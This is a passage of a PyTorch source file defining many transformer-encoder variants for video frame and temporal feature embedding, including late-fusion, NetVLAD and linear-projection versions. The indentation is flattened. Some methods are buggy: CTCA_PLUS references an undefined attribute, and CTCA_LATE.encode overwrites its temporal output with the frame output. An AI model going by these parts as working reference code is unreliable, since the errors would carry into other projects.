output = self.frame_transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = torch.cat((output, x2), 2)
output = self.segment_transformer_encoder(
output, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
class CTCA(nn.Module):
def __init__(self, feature_size=1024, feedforward=4096 , max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
class CTCA_PLUS(nn.Module):
def __init__(self, feature_size=2048, feedforward=4096, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_PLUS, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=int(feature_size/2),
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
x = x_f + x_t
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_MAX(nn.Module):
def __init__(self, feature_size=2048, feedforward=4096, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_MAX, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=int(feature_size/2),
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
x_f, x_t = x.split(int(self.feature_size/2), dim=2)
x = torch.maximum(x_f,x_t)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_FC(nn.Module):
def __init__(self, feature_size=1024, feedforward=4096 , max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_FC, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear = nn.Linear(feature_size, 1024, bias=False)
self.norm = nn.LayerNorm(1024)
self.activation = nn.ReLU()
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers, nn.Sequential(self.linear, self.activation, self.norm))
self.mlp = None
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear.weight, std=1 / math.sqrt(1024))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size + self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(
self.frame_feature_size + self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1) # (N, 1)
# print(frame_count.shape)
output_f = torch.narrow(output_f, 1, 0, int(frame_count.item()))
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=2) # (N, T, C)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1) # (N, 1)
# print(frame_count.shape)
output_t = torch.narrow(output_f, 1, 0, int(frame_count.item()))
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_f, p=2, dim=2) # (N, T, C)
embedding = torch.cat((output_f, output_t), 2)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
# output = output.permute(1, 0, 2) # (N, T, C)
# output = output * frame_mask.unsqueeze(-1)
# frame_count = torch.sum(frame_mask, dim=-1) # (N)
# output = torch.narrow(output, 1, 0, int(frame_count.item()))
#
# # L2 normalize IMPORTANT!!!
# output = F.normalize(output, p=2, dim=2) # (N, T, C)
# if self.mlp is not None:
# output = self.mlp(output)
# return output
class CTCA_LATE_PLUS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_PLUS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
# breakpoint()
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output_f.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output_f.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# breakpoint()
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = output_f + output_t
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_MAXIMUM(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_MAXIMUM, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.maximum(output_f, output_t)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_NetVLAD(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1,netvlad_clusters=16, netvlad_output_dim=512):
super(CTCA_LATE_NetVLAD, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.LayerNorm(frame_feature_size))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.LayerNorm(temporal_feature_size))
self.netvlad_f = NetVLAD(self.frame_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
self.netvlad_t = NetVLAD(self.temporal_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
## NetVLAD Embedding
output_f = output_f.permute(1, 0, 2) # (N, T, C)
output_f = output_f.unsqueeze(2).permute(0, 3, 1, 2)
output_f = self.netvlad_f(output_f, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
## NetVLAD Embedding
output_t = output_t.permute(1, 0, 2) # (N, T, C)
output_t = output_t.unsqueeze(2).permute(0, 3, 1, 2)
output_t = self.netvlad_t(output_t, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_NetVLAD_PLUS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1,netvlad_clusters=16, netvlad_output_dim=1024):
super(CTCA_LATE_NetVLAD_PLUS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.LayerNorm(frame_feature_size))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.LayerNorm(temporal_feature_size))
self.netvlad_f = NetVLAD(self.frame_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
self.netvlad_t = NetVLAD(self.temporal_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
## NetVLAD Embedding
output_f = output_f.permute(1, 0, 2) # (N, T, C)
output_f = output_f.unsqueeze(2).permute(0, 3, 1, 2)
output_f = self.netvlad_f(output_f, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
## NetVLAD Embedding
output_t = output_t.permute(1, 0, 2) # (N, T, C)
output_t = output_t.unsqueeze(2).permute(0, 3, 1, 2)
output_t = self.netvlad_t(output_t, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = output_f+output_t
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_FC(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_FC, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear_f = nn.Linear(frame_feature_size,512, bias=False)
self.linear_t = nn.Linear(temporal_feature_size,512, bias=False)
self.norm_f = nn.LayerNorm(512)
self.norm_t = nn.LayerNorm(512)
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.Sequential(self.linear_f, self.activation, self.norm_f))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.Sequential(self.linear_t, self.activation, self.norm_t))
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear_f.weight, std=1 / math.sqrt(512))
nn.init.normal_(self.linear_t.weight, std=1 / math.sqrt(512))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_FC_BIAS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_FC_BIAS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear_f = nn.Linear(frame_feature_size,512, bias=True)
self.linear_t = nn.Linear(temporal_feature_size,512, bias=True)
self.norm_f = nn.LayerNorm(512)
self.norm_t = nn.LayerNorm(512)
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.Sequential(self.linear_f, self.activation, self.norm_f))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.Sequential(self.linear_t, self.activation, self.norm_t))
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear_f.weight, std=1 / math.sqrt(512))
nn.init.normal_(self.linear_t.weight, std=1 / math.sqrt(512))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
